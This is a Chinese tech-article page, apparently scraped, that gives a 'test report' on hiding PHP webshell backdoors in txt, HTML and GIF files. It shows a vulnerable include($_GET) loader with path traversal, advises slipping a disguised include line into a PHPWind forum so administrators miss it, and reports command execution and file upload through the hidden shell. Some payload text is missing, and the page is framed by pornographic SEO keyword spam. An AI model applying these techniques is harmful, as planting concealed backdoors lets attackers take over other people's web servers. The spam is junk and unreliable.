国产成人精品久久免费动漫-国产成人精品天堂-国产成人精品区在线观看-国产成人精品日本-a级毛片无码免费真人-a级毛片毛片免费观看久潮喷

您的位置:首頁(yè)技術(shù)文章
文章詳情頁(yè)

PHP后門的隱藏技巧測(cè)試報(bào)告

瀏覽:7日期:2024-02-13 08:30:44

最近很多朋友都在問(wèn)我是否能把我那一句話木馬隱藏到HTML或圖片里,其實(shí)把一句話木馬插入到PHP文件中就已經(jīng)很隱蔽了,如果說(shuō)硬是要放到HTML文件或圖片里,就接著往下看這篇的篇測(cè)試報(bào)告吧。要知道如果光把PHP語(yǔ)句放到圖片里是無(wú)論如何也不能執(zhí)行的,因?yàn)镻HP只解析擴(kuò)展名為php的文件。所以說(shuō)要能使隱藏在圖片里的PHP語(yǔ)句執(zhí)行。我們就的借助PHP中的調(diào)用函數(shù) :include 、require 等。

我們還記得前些日子把木馬隱藏到圖片的文章吧。也就是在PHP文件里用include('x.gif')這樣的語(yǔ)句來(lái)調(diào)用隱藏在圖片的木馬語(yǔ)句。ASP中語(yǔ)句也類似??此品浅k[蔽但直接調(diào)用圖片對(duì)稍微懂點(diǎn)PHP的人就不難發(fā)現(xiàn)可疑之處。由于URL 里用GET方式很難傳遞參數(shù),這就使得插入木馬的性能得不到發(fā)揮。

Include 函數(shù)在PHP中使用的比較頻繁,所以引起的安全問(wèn)題也實(shí)在太多,例如PHPWIND1.36的漏洞就是因?yàn)閕nclude后面的變量沒(méi)做過(guò)濾引起的。由此我們就可以構(gòu)造類似的語(yǔ)句來(lái)插入到PHP文件中。然后把木馬隱藏到圖片或HTML文件里,可以說(shuō)隱蔽性就更高了。如在PHPWIND論壇里插入下面的語(yǔ)句:<‘’?@include includ/.$PHPWIND_ROOT;? > 一般管理員是無(wú)法看出來(lái)的。

有了include 函數(shù)來(lái)輔助幫忙我們就可以把PHP木馬隱藏到 諸如 txt、html和圖片文件等很多類型的文件里來(lái)了。因?yàn)閠xt、html和圖片文件這三種類型的文件最無(wú)論在論壇還是文章系統(tǒng)里是最為常見(jiàn)的了,下面我們就依次來(lái)做測(cè)試。

首先建立一PHP文件test.php 文件內(nèi)容為:

$test=$_GET['test'];

@include 'test/'.$test;

?>

Txt文件一般都是說(shuō)明文件,所以我們把一句話木馬放到目錄的說(shuō)明文件里就OK了。隨便建立一個(gè)TXT文件t.txt。我們把一句話木馬粘貼到t.txt文件里。然后訪問(wèn) http://localhost/test/test.php?test=../t.txt 如果你看到t.txt的內(nèi)容就證明Ok了, 然后把在lanker微型PHP后門客戶端 木馬地址添入 http://localhost/test/test.php?test=../t.txt 密碼里添入cmd就可以了,執(zhí)行返回的結(jié)果都可以看到。

對(duì)于HTML的文件,一般都為模版文件。為了使插入到HTML的文件的木馬能被調(diào)用執(zhí)行而且不被顯示出來(lái),我們可以在HTML里加入一個(gè)隱藏屬性的文本框 ,如: 然后使用方法同上。執(zhí)行的返回結(jié)果一般都可以查看源文件看到。 如使用查看本程序目錄功能。查看源文件內(nèi)容為 我可以得到目錄為 C:Uniserver2_7swwwtest。

下面我們說(shuō)說(shuō)圖片文件,要說(shuō)最為毒的一招莫過(guò)于把木馬隱藏到圖片里。我們可以直接對(duì)一個(gè)圖片進(jìn)行編輯,把插入到圖片末尾

經(jīng)測(cè)試一般都不會(huì)對(duì)圖片造成影響。然后同樣方法客戶端木馬地址添入

我們查看PHP環(huán)境變量 返回的是結(jié)果是原圖片。

這里可能要和我們想象的結(jié)果有些差距了,其實(shí)命令已經(jīng)運(yùn)行了,只是返回的結(jié)果看不到而已,因?yàn)檫@是真正的GIF文件,所以是不會(huì)顯示返回結(jié)果的,為了證明是否真的執(zhí)行了命令我們 執(zhí)行上傳文件命令。果不出所料,文件已經(jīng)成功上傳到服務(wù)器上。這樣偽造的優(yōu)點(diǎn)是隱蔽性好。缺點(diǎn)也自然不用說(shuō)了是沒(méi)回顯。如果你想看到返回的結(jié)果,那就拿出記事本偽造一個(gè)假的圖片文件吧。

到這里就基本測(cè)試完了,怎樣隱蔽PHP后門就看你自己的選擇了。行文倉(cāng)促,如有不妥之處,請(qǐng)指出!

標(biāo)簽: PHP
主站蜘蛛池模板: 日韩三级视频 | 久久狠狠一本精品综合网 | 韩国日本一级毛片免费视频 | 欧美激情久久久久久久久 | 毛片一级做a爰片性色 | 欧美在线一区二区三区精品 | 亚洲人成在线精品 | 欧美在线观看a | 四川一级片 | 高清一区二区三区免费 | 一区二区三区免费精品视频 | 久久大陆| 中文字幕一区二区三区亚洲精品 | 国产真实乱系列2孕妇 | 久久影院一区二区三区 | 久9这里精品免费视频 | 欧美牲| 国产在线精品观看一区 | 在线播放一级片 | 美国一级毛片视频 | 久久草网站 | 91在线精品亚洲一区二区 | 亚洲国产精品成人久久 | 国产精品视频视频久久 | 国产亚洲精品hd网站 | 美女全黄视频 | 她也啪97在线视频 | 国产成年| 欧美一级看片a免费观看 | 成人黄色在线网站 | 国产成人精品日本亚洲网址 | 国产精品欧美亚洲 | 国产精品永久在线 | 久久久久久久久网站 | 亚洲精品视频免费看 | 国产在线不卡午夜精品2021 | 国产精品一区二区在线观看 | 中美日韩在线网免费毛片视频 | 国产麻豆福利a v在线播放 | 狠狠色噜狠狠狠狠色综合久 | 欧美一级乱理片免费观看 |